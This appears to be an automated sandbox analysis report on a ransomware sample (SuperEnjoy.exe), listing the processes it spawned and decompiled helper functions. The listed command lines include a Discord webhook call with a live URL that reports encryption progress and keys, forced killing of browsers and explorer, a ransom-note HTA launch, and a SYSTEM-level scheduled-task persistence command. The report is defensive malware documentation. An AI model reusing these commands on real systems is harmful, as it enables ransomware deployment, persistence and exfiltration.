                                                                                                                                                                    MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: DiscordSendWebhook.exe PID: 6340 Parent PID: 6276

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:13
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:'C:\Windows\Temp\1810.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                    File size:988672 bytes
                                                                                                                                                                    MD5 hash:FB7A78F485EC2586C54D60D293DD5352
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 8%, Metadefender, Browse
                                                                                                                                                                    • Detection: 8%, ReversingLabs

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: cmd.exe PID: 6356 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:13
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c dir * /a-D /s /b | findstr /I /V /C:'^$'
                                                                                                                                                                    Imagebase:0x7ff77d8b0000
                                                                                                                                                                    File size:273920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: cmd.exe PID: 6368 Parent PID: 6356

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:14
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c' dir * /a-D /s /b '
                                                                                                                                                                    Imagebase:0x7ff77d8b0000
                                                                                                                                                                    File size:273920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: findstr.exe PID: 6388 Parent PID: 6356

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:14
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:findstr /I /V /C:'^$'
                                                                                                                                                                    Imagebase:0x7ff6b0c70000
                                                                                                                                                                    File size:34304 bytes
                                                                                                                                                                    MD5 hash:BCC8F29B929DABF5489C9BE6587FF66D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: taskkill.exe PID: 6712 Parent PID: 6276

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:28
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:taskkill /f /im opera.exe
                                                                                                                                                                    Imagebase:0x7ff7a9ab0000
                                                                                                                                                                    File size:94720 bytes
                                                                                                                                                                    MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: taskkill.exe PID: 6752 Parent PID: 6276

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:29
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:taskkill /f /im chrome.exe
                                                                                                                                                                    Imagebase:0x7ff7a9ab0000
                                                                                                                                                                    File size:94720 bytes
                                                                                                                                                                    MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: taskkill.exe PID: 6800 Parent PID: 6276

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:30
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:taskkill /f /im firefox.exe
                                                                                                                                                                    Imagebase:0x7ff7a9ab0000
                                                                                                                                                                    File size:94720 bytes
                                                                                                                                                                    MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: taskkill.exe PID: 6828 Parent PID: 6276

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:31
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:taskkill /f /im iexplore.exe
                                                                                                                                                                    Imagebase:0x7ff7a9ab0000
                                                                                                                                                                    File size:94720 bytes
                                                                                                                                                                    MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: mshta.exe PID: 6884 Parent PID: 6276

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:32
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:'C:\Windows\SysWOW64\mshta.exe' 'C:\Windows\system32\config\systemprofile\cryptormsg.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                                    Imagebase:0xfe0000
                                                                                                                                                                    File size:13312 bytes
                                                                                                                                                                    MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: taskkill.exe PID: 6904 Parent PID: 6276

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:36
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:taskkill /f /im explorer.exe
                                                                                                                                                                    Imagebase:0x7ff7e7090000
                                                                                                                                                                    File size:94720 bytes
                                                                                                                                                                    MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: schtasks.exe PID: 7104 Parent PID: 6276

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:38
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM'
                                                                                                                                                                    Imagebase:0x7ff7e3280000
                                                                                                                                                                    File size:226816 bytes
                                                                                                                                                                    MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Code Analysis

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Analysis Process: SuperEnjoy.exe PID: 4700 Parent PID: 5716 SuperEnjoy.exeCOMMON

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 0040A6F6, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                      			E0040A6F6(void* __eflags, intOrPtr _a4) {
				_Unknown_base(*)()* _t9;
				signed int _t11;
				signed int _t12;
				void* _t13;
				WCHAR* _t14;
				struct HINSTANCE__* _t17;

				_t14 = E0040E200(0x104, _a4);
				_t12 = GetTempPathW(0x104, _t14);
				_t17 = LoadLibraryW(L"Kernel32.DLL");
				if(_t17 != 0) {
					_t9 = GetProcAddress(_t17, "GetLongPathNameW");
					if(_t9 != 0) {
						_t11 =  *_t9(_t14, _t14, 0x104); // executed
						_t12 = _t11;
					}
					FreeLibrary(_t17);
				}
				E0040E350(_t13, 0x104 - _t12);
				_t14[_t12] = 0;
				return 0;
			}









                                                                                                                                                                      0x0040a709
                                                                                                                                                                      0x0040a718
                                                                                                                                                                      0x0040a720
                                                                                                                                                                      0x0040a724
                                                                                                                                                                      0x0040a72c
                                                                                                                                                                      0x0040a734
                                                                                                                                                                      0x0040a739
                                                                                                                                                                      0x0040a73b
                                                                                                                                                                      0x0040a73b
                                                                                                                                                                      0x0040a73e
                                                                                                                                                                      0x0040a73e
                                                                                                                                                                      0x0040a747
                                                                                                                                                                      0x0040a74e
                                                                                                                                                                      0x0040a756

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
                                                                                                                                                                        • Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(02370000,00000000,?,?), ref: 0040E267
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A70D
                                                                                                                                                                      • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A71A
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A72C
                                                                                                                                                                      • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A739
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A73E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
                                                                                                                                                                      • String ID: GetLongPathNameW$Kernel32.DLL
                                                                                                                                                                      • API String ID: 1993255246-2943376620
                                                                                                                                                                      • Opcode ID: d718137a791e701f6bd57810b192c1db4f572494fd9ecd74e792e9dadcbe4658
                                                                                                                                                                      • Instruction ID: 764606bb569eff9aa2a854e4b0558f5753b22c8873abefb13c435e0df7790d1f
                                                                                                                                                                      • Opcode Fuzzy Hash: d718137a791e701f6bd57810b192c1db4f572494fd9ecd74e792e9dadcbe4658
                                                                                                                                                                      • Instruction Fuzzy Hash: B4F0E9322012147FC2102BB6AC4CEEB3E6CDF95755701443AF904E2251DB69CC20C2BD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004098D0, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                                      			E004098D0(_Unknown_base(*)()* _a4) {
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;

				 *0x4170e8 = _a4;
				_a4 = E00409890;
				_t6 = _a4;
				if(_t6 == 0) {
					_t7 = SetUnhandledExceptionFilter( *0x4170f0);
					 *0x4170f0 = 0;
					return _t7;
				} else {
					if( *0x4170f0 != 0) {
						_a4 = _t6;
						return SetUnhandledExceptionFilter(??);
					}
					_t8 = SetUnhandledExceptionFilter(_t6); // executed
					 *0x4170f0 = _t8;
					return _t8;
				}
			}






                                                                                                                                                                      0x004098d4
                                                                                                                                                                      0x004098d9
                                                                                                                                                                      0x004099f0
                                                                                                                                                                      0x004099f6
                                                                                                                                                                      0x00409a20
                                                                                                                                                                      0x00409a26
                                                                                                                                                                      0x00409a30
                                                                                                                                                                      0x004099f8
                                                                                                                                                                      0x004099ff
                                                                                                                                                                      0x00409a01
                                                                                                                                                                      0x00409a05
                                                                                                                                                                      0x00409a05
                                                                                                                                                                      0x00409a0c
                                                                                                                                                                      0x00409a12
                                                                                                                                                                      0x00409a17
                                                                                                                                                                      0x00409a17

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(00409890,0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008), ref: 00409A0C
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 00409A20
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                      • Opcode ID: 8b0f608e405cae46fc8e63b589dbaca7258740b989b39933334343d4a09fb59f
                                                                                                                                                                      • Instruction ID: 2c8fa190a6d032f87ec30cf03d38c93985f91324802676e59826f832aed0a575
                                                                                                                                                                      • Opcode Fuzzy Hash: 8b0f608e405cae46fc8e63b589dbaca7258740b989b39933334343d4a09fb59f
                                                                                                                                                                      • Instruction Fuzzy Hash: 38E0E5B0208341EFC710CF18E948B867BF5B788701F01C43AE445922A5E7348C44EF5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040195B, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 56%
                                                                                                                                                                      			E0040195B(char __edx) {
				intOrPtr _v12;
				char _v16;
				signed int _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				char _v40;
				WCHAR* _v52;
				WCHAR* _v76;
				WCHAR* _v100;
				intOrPtr _v116;
				void* _t28;
				void* _t29;
				void* _t35;
				void* _t36;
				void* _t44;
				void* _t45;
				void* _t54;
				void* _t55;
				void* _t63;
				void* _t68;
				char* _t72;
				void* _t74;
				void* _t75;
				void* _t79;
				char _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t100;
				intOrPtr* _t101;

				_t86 = __edx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0040DF60();
				 *0x41702c = 0x416107;
				_v28 = 0;
				while(1) {
					_t103 = 3 - _v28;
					if(3 < _v28) {
						break;
					}
					_t72 =  *0x41702c; // 0x41609a
					_v24 =  *_t72;
					 *0x41702c =  *0x41702c + 1;
					_t74 = E0040DE20();
					_t97 = _t86;
					_push(_t74);
					_push(_t97);
					_t75 = E0040DE20();
					E00405D60(_t103, _v24 * 0xffffffff);
					E0040DE60( &_v28, _t75);
					_push(_v32);
					_t79 = E0040DE20();
					_pop(_t100);
					E0040DFC0(_t100);
					_t86 = _v40;
					E0040DFC0(_t86);
					E0040DE60( &_v40, _t79);
					 *_t101 =  *_t101 + 1;
					_t104 =  *_t101;
					if( *_t101 >= 0) {
						continue;
					}
					break;
				}
				_v16 = E00409B40(0x400);
				_t28 = E0040DE20();
				_t87 = _t86;
				_push(_t28);
				_t29 = E0040DE20();
				_t88 = _t87;
				E0040A6F6(_t104, _t29);
				_push( &_v16);
				E0040DE60();
				GetTempFileNameW(_v24, 0x416020, 0, _v28); // executed
				_t35 = E0040DE20();
				_t89 = _t88;
				_push(_t35);
				_t36 = E0040DE20();
				_t90 = _t89;
				E00409B60(_v28, _t36);
				_push(0x417070);
				E0040DE60();
				E0040A787( *0x417070);
				E0040A665( *0x417070); // executed
				GetTempFileNameW( *0x417070, 0x416020, 0, _v52); // executed
				_t44 = E0040DE20();
				_t91 = _t90;
				_push(_t44);
				_t45 = E0040DE20();
				_t92 = _t91;
				E00409B60(_v52, _t45);
				_push(0x417024);
				E0040DE60();
				E0040A787( *0x417024);
				E0040A665( *0x417024); // executed
				GetTempFileNameW( *0x417024, 0x416020, 0, _v76); // executed
				PathAddBackslashW( *0x417024);
				_t54 = E0040DE20();
				_t93 = _t92;
				_push(_t54);
				_t55 = E0040DE20();
				_t94 = _t93;
				E00409B60(_v76, _t55);
				_push(0x417038);
				E0040DE60();
				E0040A787( *0x417038);
				PathRenameExtensionW( *0x417038, _v100);
				GetTempFileNameW( *0x417024, 0x416020, 0, _v100); // executed
				_t63 = E0040DE20();
				_t95 = _t94;
				_push(_t63);
				E00409B60(_v100, E0040DE20());
				E0040DE60(0x417068, _t95);
				_t68 = E00409B20(_v116);
				return E0040DEF0(E0040DEF0(E0040DEF0(_t68, _v12), _v28), _v28);
			}








































                                                                                                                                                                      0x0040195b
                                                                                                                                                                      0x0040195e
                                                                                                                                                                      0x0040195f
                                                                                                                                                                      0x00401960
                                                                                                                                                                      0x00401961
                                                                                                                                                                      0x00401962
                                                                                                                                                                      0x00401963
                                                                                                                                                                      0x00401964
                                                                                                                                                                      0x0040196e
                                                                                                                                                                      0x00401973
                                                                                                                                                                      0x0040197c
                                                                                                                                                                      0x00401981
                                                                                                                                                                      0x00401984
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401986
                                                                                                                                                                      0x0040198e
                                                                                                                                                                      0x00401992
                                                                                                                                                                      0x00401999
                                                                                                                                                                      0x0040199e
                                                                                                                                                                      0x0040199f
                                                                                                                                                                      0x004019a0
                                                                                                                                                                      0x004019a1
                                                                                                                                                                      0x004019b0
                                                                                                                                                                      0x004019ba
                                                                                                                                                                      0x004019c3
                                                                                                                                                                      0x004019c4
                                                                                                                                                                      0x004019c9
                                                                                                                                                                      0x004019cc
                                                                                                                                                                      0x004019d1
                                                                                                                                                                      0x004019d6
                                                                                                                                                                      0x004019e0
                                                                                                                                                                      0x004019e5
                                                                                                                                                                      0x004019e5
                                                                                                                                                                      0x004019e8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004019e8
                                                                                                                                                                      0x004019f4
                                                                                                                                                                      0x004019f9
                                                                                                                                                                      0x004019fe
                                                                                                                                                                      0x004019ff
                                                                                                                                                                      0x00401a01
                                                                                                                                                                      0x00401a06
                                                                                                                                                                      0x00401a08
                                                                                                                                                                      0x00401a11
                                                                                                                                                                      0x00401a12
                                                                                                                                                                      0x00401a2a
                                                                                                                                                                      0x00401a30
                                                                                                                                                                      0x00401a35
                                                                                                                                                                      0x00401a36
                                                                                                                                                                      0x00401a38
                                                                                                                                                                      0x00401a3d
                                                                                                                                                                      0x00401a43
                                                                                                                                                                      0x00401a4e
                                                                                                                                                                      0x00401a4f
                                                                                                                                                                      0x00401a5a
                                                                                                                                                                      0x00401a65
                                                                                                                                                                      0x00401a7f
                                                                                                                                                                      0x00401a85
                                                                                                                                                                      0x00401a8a
                                                                                                                                                                      0x00401a8b
                                                                                                                                                                      0x00401a8d
                                                                                                                                                                      0x00401a92
                                                                                                                                                                      0x00401a98
                                                                                                                                                                      0x00401aa3
                                                                                                                                                                      0x00401aa4
                                                                                                                                                                      0x00401aaf
                                                                                                                                                                      0x00401aba
                                                                                                                                                                      0x00401ad4
                                                                                                                                                                      0x00401adf
                                                                                                                                                                      0x00401ae5
                                                                                                                                                                      0x00401aea
                                                                                                                                                                      0x00401aeb
                                                                                                                                                                      0x00401aed
                                                                                                                                                                      0x00401af2
                                                                                                                                                                      0x00401af8
                                                                                                                                                                      0x00401b03
                                                                                                                                                                      0x00401b04
                                                                                                                                                                      0x00401b0f
                                                                                                                                                                      0x00401b1e
                                                                                                                                                                      0x00401b38
                                                                                                                                                                      0x00401b3e
                                                                                                                                                                      0x00401b43
                                                                                                                                                                      0x00401b44
                                                                                                                                                                      0x00401b51
                                                                                                                                                                      0x00401b5d
                                                                                                                                                                      0x00401b66
                                                                                                                                                                      0x00401b8e

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77
                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,00416020,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
                                                                                                                                                                      • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,?,00000000,00000000,?,00416020,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
                                                                                                                                                                      • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,?,00416020), ref: 00401AD4
                                                                                                                                                                      • PathAddBackslashW.SHLWAPI(00416020,00000000,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,?,00416020), ref: 00401ADF
                                                                                                                                                                      • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000), ref: 00401B1E
                                                                                                                                                                      • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,?,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,00416020), ref: 00401B38
                                                                                                                                                                        • Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
                                                                                                                                                                        • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
                                                                                                                                                                        • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                                                                                                        • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02370000,00000000,?), ref: 0040DE99
                                                                                                                                                                        • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02370000,00000000,?,?), ref: 0040DEBC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                                                                                                                                                      • String ID: `A$ `A$ `A$ `A
                                                                                                                                                                      • API String ID: 368575804-2594752929
                                                                                                                                                                      • Opcode ID: d30ce261afac5ce3852bfbcc64f89f07c954c0fb097e7903f9b80452b807dfe3
                                                                                                                                                                      • Instruction ID: da94853b8b5bd26d1bd5120d1b9c906e5f4cf8f619d60ffb6644f8987c096960
                                                                                                                                                                      • Opcode Fuzzy Hash: d30ce261afac5ce3852bfbcc64f89f07c954c0fb097e7903f9b80452b807dfe3
                                                                                                                                                                      • Instruction Fuzzy Hash: 6651EEB59047006ED601BBB2DD42E7F7B7EEB98318F00883FB540690E2C63D9C559A6D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403275, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                      			E00403275(void* __edi, void* __ebp, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				WCHAR* _v16;
				char _v24;
				WCHAR* _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _t43;
				void* _t45;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t62;
				void* _t69;
				void* _t75;
				void* _t80;
				void* _t90;
				void* _t106;
				intOrPtr _t108;
				void* _t109;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t123;
				intOrPtr _t125;
				void* _t126;
				void* _t128;
				void* _t129;
				void* _t130;

				_t129 = __ebp;
				_t128 = __edi;
				_t106 = 7;
				do {
					_t130 = _t130 - 4;
					_v8 = 0;
					_t106 = _t106 - 1;
				} while (_t106 != 0);
				E004051A0(E0040DF60(), _a36);
				E00405060(_t130, _a24);
